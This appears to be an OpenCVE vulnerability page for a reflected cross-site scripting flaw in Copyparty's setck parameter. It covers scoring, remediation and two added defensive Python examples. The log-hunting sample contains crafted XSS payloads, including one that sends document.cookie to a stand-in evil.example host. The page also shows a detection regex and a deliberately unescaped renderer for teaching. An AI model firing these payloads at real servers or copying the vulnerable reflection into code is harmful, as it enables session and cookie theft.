Description
Copyparty is a portable file server. In versions prior to 1.20.9, an XSS allows for reflected cross-site scripting via URL-parameter `?setck=...`. Version 1.20.9 fixes the issue.
Published: 2026-02-26
Score: 5.4 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Reflected Cross‑Site Scripting
Action: Patch
AI Analysis

Impact

Copyparty, a portable file server, has a reflected cross‑site scripting flaw in the handling of its setck URL parameter: the value is reflected into the server's response without adequate neutralization, so a crafted link makes the victim's browser execute attacker‑supplied JavaScript in the origin of the Copyparty instance. From there the script can read whatever the page can read and act as the victim, for example exfiltrating cookies that are not marked HttpOnly or issuing requests with the victim's session, so both confidentiality and integrity are affected. The weakness is CWE‑79, Improper Neutralization of Input During Web Page Generation.

Affected Systems

Versions of Copyparty earlier than 1.20.9 are affected; 1.20.9 contains the fix. Copyparty is a self‑hosted file sharing service, so exposure depends on each deployment: whether the instance is reachable from the Internet and who its users are.

Risk and Exploitability

The CVSS v3.1 base score of 5.4 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) indicates moderate severity: the attack is network‑reachable and needs no privileges, but it requires user interaction and has a limited impact on confidentiality and integrity. The EPSS score of less than 1% indicates a very low current probability of exploitation, and the flaw is not listed in the CISA KEV catalog. As with any reflected XSS, an attacker must get a victim to open a crafted URL containing the setck parameter; the script then runs in the victim's browser against the Copyparty instance they are using. Because the remediation is a straightforward version upgrade, it should be applied promptly despite the low exploitation likelihood.

Generated by OpenCVE AI on April 18, 2026 at 17:36 UTC.
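To see what the exploitation path described above looks like from the defender's side, here is an added example that is not part of the OpenCVE analysis and not copyparty tooling: it hunts web‑server access logs for requests whose setck value decodes to markup or script. The log lines are constructed in Combined Log Format, the SUSPICIOUS pattern is a heuristic of my own, and because the page gives no payload details, real attempts may be encoded differently. The script flags delivery attempts, not successful execution.

```python
"""Hunting for crafted ?setck= requests in web-server access logs.

Constructed example, not copyparty tooling. The log lines are made up in
Combined Log Format; the heuristic flags a setck value that decodes to
something tag-like or script-like. It detects attempts, not execution.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines: one benign use of setck, two crafted ones, one unrelated.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Feb/2026:10:01:12 +0000] "GET /?setck=theme%3D2 HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
10.0.0.9 - - [26/Feb/2026:10:02:44 +0000] "GET /?setck=%3Cscript%3Efetch(%27//evil.example/%27%2Bdocument.cookie)%3C/script%3E HTTP/1.1" 200 1901 "-" "Mozilla/5.0"
10.0.0.9 - - [26/Feb/2026:10:02:51 +0000] "GET /?setck=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 1899 "-" "Mozilla/5.0"
10.0.0.7 - - [26/Feb/2026:10:03:02 +0000] "GET /files/report.pdf HTTP/1.1" 200 88213 "-" "Mozilla/5.0"
"""

# Heuristic (assumption, not from the advisory): markup or script fragments
# that have no business in a cookie-setting value.
SUSPICIOUS = re.compile(
    r"<\s*/?\s*[a-z]|javascript\s*:|\bon[a-z]+\s*=|[\"']\s*>", re.IGNORECASE
)
# Client, timestamp and request target from a Combined Log Format line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST|HEAD) (\S+) ')


def setck_values(request_target: str) -> list[str]:
    """All ?setck= values in a request target, decoded twice to catch double-encoding."""
    qs = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    return [unquote(v) for v in qs.get("setck", [])]


def is_suspicious(value: str) -> bool:
    """True if the decoded value contains a tag, event handler or javascript: URL."""
    return bool(SUSPICIOUS.search(value))


def find_setck_attempts(log_text: str) -> list[dict]:
    """Return one record per log line whose setck value looks like injected markup."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip it
        client, ts, target = m.groups()
        for value in setck_values(target):
            if is_suspicious(value):
                hits.append({"client": client, "time": ts, "setck": value})
    return hits


if __name__ == "__main__":
    for hit in find_setck_attempts(SAMPLE_LOG):
        print(f"{hit['time']} {hit['client']} setck={hit['setck']!r}")
```

Expect false positives from legitimate values that happen to contain an on…= token or a bare quote; treat a hit as a lead to look at the client's other requests, and pair it with the version check (anything earlier than 1.20.9 on the receiving end was exposed).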

Remediation

Vendor fix: Copyparty 1.20.9 and later (see GitHub advisory GHSA-62cr-6wp5-q43h). No vendor workaround is listed.

OpenCVE Recommended Actions

  • Upgrade Copyparty to version 1.20.9 or later, which fixes the handling of the setck parameter
  • If an immediate upgrade is not feasible, reduce the population of potential victims: restrict network access to the instance and require authentication so that only trusted users can reach it. Authentication alone does not stop an authenticated user from being attacked through a crafted link
  • As defence in depth, have the server or a reverse proxy in front of it send a Content‑Security‑Policy header that disallows inline scripts, which blocks the typical reflected payload even where escaping is missed; verify that the application still works under the policy before enforcing it. Escaping user‑supplied values for the context they are rendered in is the application's job and cannot be substituted by operator configuration, so the upgrade remains necessary

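The third recommendation, escape on output and add a Content‑Security‑Policy, is illustrated below in an added example. It is not copyparty's code: the page does not say where the setck value is reflected, so this toy page builder (render_vulnerable, render_hardened and the CRAFTED_URL payload are all constructed here) stands in for a server that echoes the parameter into HTML text. html.escape is the right encoder for an HTML text or quoted‑attribute context only; a value reflected inside a script block or a URL would need a different encoder.

```python
"""Reflected-XSS pattern of the kind behind CVE-2026-27948, and its fix.

Constructed example, not copyparty's code: a toy page builder echoes the
`setck` query parameter into HTML, first verbatim (vulnerable) and then with
output encoding plus a Content-Security-Policy header (hardened).
"""
import html
from urllib.parse import parse_qs, urlsplit

# Constructed attacker URL: a <script> tag smuggled in via the setck parameter.
CRAFTED_URL = (
    "http://files.example/?setck=%3Cscript%3Ealert(document.cookie)%3C/script%3E"
)


def setck_value(url: str) -> str:
    """Return the URL-decoded value of ?setck=, or '' if absent."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get("setck", [""])[0]


def render_vulnerable(url: str) -> str:
    """Vulnerable pattern: the parameter is concatenated into HTML unchanged."""
    return "<p>cookie set to: " + setck_value(url) + "</p>"


def render_hardened(url: str) -> tuple[str, dict[str, str]]:
    """Hardened pattern: HTML-escape on output and send a CSP that refuses inline script."""
    body = "<p>cookie set to: " + html.escape(setck_value(url), quote=True) + "</p>"
    headers = {
        "Content-Type": "text/html; charset=utf-8",
        # Defence in depth: even if escaping were missed somewhere, a compliant
        # browser refuses inline <script> blocks and javascript: URLs under this policy.
        "Content-Security-Policy": (
            "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'"
        ),
    }
    return body, headers


def contains_live_markup(rendered: str) -> bool:
    """Crude check used here only to show the difference: does a raw <script tag survive?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print(render_vulnerable(CRAFTED_URL))
    body, hdrs = render_hardened(CRAFTED_URL)
    print(body)
    print(hdrs["Content-Security-Policy"])
```

Running the module prints the raw reflection first and then the escaped version. The policy in render_hardened is what an operator would add at the reverse proxy; test it against the live UI first, because any inline scripts the application itself relies on would be blocked by the same rule.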


Advisories
Source         ID                     Title
GitHub GHSA    GHSA-62cr-6wp5-q43h    Copyparty vulnerable to reflected XSS via setck parameter
History

Sat, 28 Feb 2026 01:00:00 +0000

Type    Values Removed    Values Added
CPEs    -                 cpe:2.3:a:9001:copyparty:*:*:*:*:*:*:*:*

Fri, 27 Feb 2026 17:15:00 +0000

Type       Values Removed    Values Added
Metrics    -                 ssvc: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Thu, 26 Feb 2026 13:30:00 +0000

Type                   Values Removed    Values Added
First Time appeared    -                 9001; 9001 copyparty
Vendors & Products     -                 9001; 9001 copyparty

Thu, 26 Feb 2026 02:15:00 +0000

Type           Values Removed    Values Added
Description    -                 Copyparty is a portable file server. In versions prior to 1.20.9, an XSS allows for reflected cross-site scripting via URL-parameter `?setck=...`. Version 1.20.9 fixes the issue.
Title          -                 Copyparty vulnerable to reflected cross-site scripting via setck parameter
Weaknesses     -                 CWE-79
References     -                 -
Metrics        -                 cvssV3_1: {'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N'}


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-02-26T15:07:56.702Z

Reserved: 2026-02-25T03:11:36.690Z

Link: CVE-2026-27948

Vulnrichment

Updated: 2026-02-26T15:06:30.004Z

NVD

Status: Analyzed

Published: 2026-02-26T02:16:22.733

Modified: 2026-02-28T00:56:59.110

Link: CVE-2026-27948

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-18T17:45:06Z

Weaknesses